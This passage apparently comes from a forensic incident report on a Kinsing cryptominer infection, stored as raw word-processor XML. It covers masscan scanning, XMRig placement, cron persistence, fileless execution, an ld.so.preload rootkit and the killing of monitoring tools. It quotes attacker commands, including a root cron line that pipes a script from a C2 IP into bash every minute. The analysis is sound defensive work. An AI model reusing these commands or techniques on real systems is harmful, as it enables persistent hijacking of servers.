        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Masscan Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing deploys a tool called "firewire" (masscan wrapper) for network scanning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x firewire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x firewire.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The scanning tool is downloaded from C2, renamed to "firewire" to avoid detection, and executes port scans against target ranges provided by the C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Miner Deployment &amp; Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing's primary payload objective is deploying the XMRig cryptocurrency miner:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deployment Path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/kdevtmpfsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (primary) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm/kdevtmpfsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (shared memory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lock File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/run/lock/linux.lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — prevents multiple instances</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Miner Monitoring: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.minerRunningCheck runs continuously, restarting the miner if killed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PID Tracking: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.getMinerPid and main.sendMinerPid report miner status to C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU Affinity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing string table contains CPU affinity/CPUID references suggesting dynamic CPU allocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Persistence &amp; Anti-Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron-Based Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Root crontab (installed Thu Mar 19 02:19:44 2026):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">* * * * * wget -q -O - http://80.64.16[.]241/mt.sh | bash &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes every minute, downloading and running a shell script from C2. The script likely re-deploys Kinsing and kdevtmpfsi if they are killed. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> suppresses all output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary Deletion (Fileless Execution)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing binary at /etc/data/kinsing was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">deleted from disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> but continues running from memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process 48227 maps show: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/data/kinsing (deleted)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery was possible via /proc/48227/exe extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This fileless technique evades find-based file scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Competition Elimination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The killer family of functions (main.killer, main.goMkill, main.killByExe, main.killByFiles, main.killNonRoot, main.killOld) systematically eliminates competing cryptocurrency miners and other malware to maximize resource capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 Rootkit Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ld.so.preload Rootkit (Previously Removed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The security team previously removed an ld.so.preload rootkit deployed by Kinsing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mechanism: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Added entry to /etc/ld.so.preload pointing to a malicious shared library (libsystem.so)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Effect: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The library was loaded into every new process via the dynamic linker, hooking libc functions (readdir, fopen, etc.) to hide Kinsing/miner processes and files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Removed by security team prior to this analysis. ld_preload_hunt.txt shows clean /etc/ld.so.preload at time of evidence collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Monitoring / Tool Killing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The user-reported issue of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">top being killed instantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is attributed to Kinsing's built-in process monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.goProcStat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Continuously scans /proc for analysis tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.goMkill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Kills detected monitoring/analysis processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.killer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Master kill routine that coordinates process elimination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence from monitoring_tool_kills.txt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">top exits normally (exit 0) when run through sudo/SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">htop fails (exit 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Renamed top binary also exits normally (exit 0) — confirming the kill targets process name, not the binary itself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">top binary verified legitimate: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256 6fc5a01..., part of procps package, no modification detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The kill mechanism appears to target </w:t>
      </w:r>
      <w:r>
